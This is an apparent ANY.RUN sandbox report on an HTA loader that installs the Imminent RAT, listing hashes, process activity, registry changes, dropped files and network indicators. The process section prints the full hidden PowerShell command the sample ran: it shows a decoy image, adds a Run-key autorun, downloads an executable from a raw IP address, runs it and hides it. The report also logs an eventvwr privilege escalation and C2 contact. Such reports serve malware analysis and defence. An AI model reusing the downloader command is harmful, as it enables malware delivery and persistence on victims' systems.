analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

MSHTAPayload.hta

Full analysis: https://app.any.run/tasks/a8f071fe-bd32-4f57-933c-669d5537f737
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 15:55:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
rat
imminent
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5:

8DAC1238C4E6F81FEF8F28D4D75A8CBE

SHA1:

6464182F5A143C8F4BD1B9E7F2ECA3828ECD540E

SHA256:

55E2D6953DDBAD58F974EDAEE80F2C97D1025B434DACB1C5A5C967F532590E9B

SSDEEP:

96:wBvaY1zUMd6VfRjF/RFbZOSocbk236yOpDHvknRRzG:wb1zUrbTQMk+p6bQRRzG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • powershell.exe (PID: 1372)
    • Known privilege escalation attack

      • MOVZmlGuc.exe (PID: 1988)
    • Application was dropped or rewritten from another process

      • MOVZmlGuc.exe (PID: 1988)
      • MOVZmlGuc.exe (PID: 2212)
    • Downloads executable files from IP

      • powershell.exe (PID: 1372)
    • Uses Task Scheduler to run other applications

      • MOVZmlGuc.exe (PID: 2212)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1372)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 580)
    • Detected Imminent RAT

      • RegAsm.exe (PID: 3276)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1372)
      • MOVZmlGuc.exe (PID: 2212)
      • RegAsm.exe (PID: 3276)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1372)
      • MOVZmlGuc.exe (PID: 2212)
    • Executes PowerShell scripts

      • iexplore.exe (PID: 4060)
    • Uses ATTRIB.EXE to modify file attributes

      • powershell.exe (PID: 1372)
    • Modifies the open verb of a shell class

      • MOVZmlGuc.exe (PID: 1988)
    • Connects to unusual port

      • RegAsm.exe (PID: 3276)
  • INFO

    • Reads internet explorer settings

      • iexplore.exe (PID: 4060)
    • Application launched itself

      • iexplore.exe (PID: 3388)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 4060)
    • Changes internet zones settings

      • iexplore.exe (PID: 3388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
12
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe no specs powershell.exe PhotoViewer.dll no specs movzmlguc.exe no specs attrib.exe no specs eventvwr.exe no specs eventvwr.exe movzmlguc.exe #IMMINENT regasm.exe schtasks.exe no specs wmiapsrv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3388"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayload.hta.htmlC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
4060"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3388 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1372"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://www.hloom.com/images/Photography-Invoice-Hourly-Word.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 30;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'http://77.73.68.110/bullet967/ORDER883847777384pdf.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'https://www.hloom.com/images/Photography-Invoice-Hourly-Word.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 30;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'http://77.73.68.110/bullet967/ORDER883847777384pdf.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3332C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1988"C:\Users\admin\AppData\Roaming\MOVZmlGuc.exe" C:\Users\admin\AppData\Roaming\MOVZmlGuc.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2588"C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\MOVZmlGuc.exeC:\Windows\system32\attrib.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1620"C:\Windows\System32\eventvwr.exe" C:\Windows\System32\eventvwr.exeMOVZmlGuc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Event Viewer Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3456"C:\Windows\System32\eventvwr.exe" C:\Windows\System32\eventvwr.exe
MOVZmlGuc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Viewer Snapin Launcher
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2212"C:\Users\admin\AppData\Roaming\MOVZmlGuc.exe" C:\Users\admin\AppData\Roaming\MOVZmlGuc.exe
eventvwr.exe
User:
admin
Integrity Level:
HIGH
3276"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
MOVZmlGuc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft .NET Assembly Registration Utility
Version:
2.0.50727.5420 (Win7SP1.050727-5400)
Total events
1 579
Read events
1 413
Write events
164
Delete events
2

Modification events

(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{C8B2E4BB-E36E-11E8-9C83-5254004AAD11}
Value:
0
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
3
(PID) Process:(3388) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E2070B00040008000F00380000002F01
Executable files
2
Suspicious files
5
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
3388iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico
MD5:
SHA256:
3388iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3UB8HHRRVQII7X8M2Q86.temp
MD5:
SHA256:
1372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1897a7.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
1372powershell.exeC:\Users\admin\AppData\Roaming\MOVZmlGuc.jpgimage
MD5:FDA1F8FA0046738B09529B8CE405AFB3
SHA256:85C5E962DD681450D25BDD619ACACFE050EC9FF2DB9F1B06B488A1C8029AFF37
2212MOVZmlGuc.exeC:\Users\admin\AppData\Roaming\jxcpzjcdcbys\bzyqkmbvvnvg.exeexecutable
MD5:4818DD6AB1258B55F6B087504A4CDC74
SHA256:5931ECA638A14AB809E8F2BDC53890285E0A4E1FD72E99F0AA83A61F2ADEAA55
3388iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[2].pngimage
MD5:9FB559A691078558E77D6848202F6541
SHA256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
1372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3276RegAsm.exeC:\Users\admin\AppData\Roaming\Imminent\Monitoring\system.datbinary
MD5:D6EF55C006322B4DDAC94D973D84B74E
SHA256:EBF41A93BE6F8DB6331C1D9895635F550573C7689733CCAC9E3E2F3B9633D411
3276RegAsm.exeC:\Users\admin\AppData\Roaming\Imminent\Monitoring\network.datbinary
MD5:0F6C504C029E27F412AACED7A4CD2833
SHA256:6F18E54EABBF051C9969B4DA8BE9E02C77839B3935E758BDDACACC2AF8429BCF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
21
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1372
powershell.exe
GET
200
77.73.68.110:80
http://77.73.68.110/bullet967/ORDER883847777384pdf.exe
RU
executable
1.69 Mb
suspicious
3388
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3388
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
1372
powershell.exe
104.18.247.41:443
www.hloom.com
Cloudflare Inc
US
shared
1372
powershell.exe
77.73.68.110:80
OOO Fishnet Communications
RU
suspicious
3276
RegAsm.exe
191.101.22.251:9802
cheap.alibobomoneyman.xyz
UK Dedicated Servers Limited
GB
malicious
191.101.22.251:9802
cheap.alibobomoneyman.xyz
UK Dedicated Servers Limited
GB
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.hloom.com
  • 104.18.247.41
  • 104.18.246.41
unknown
cheap.alibobomoneyman.xyz
  • 191.101.22.251
malicious

Threats

PID
Process
Class
Message
1372
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
1372
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1372
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1372
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info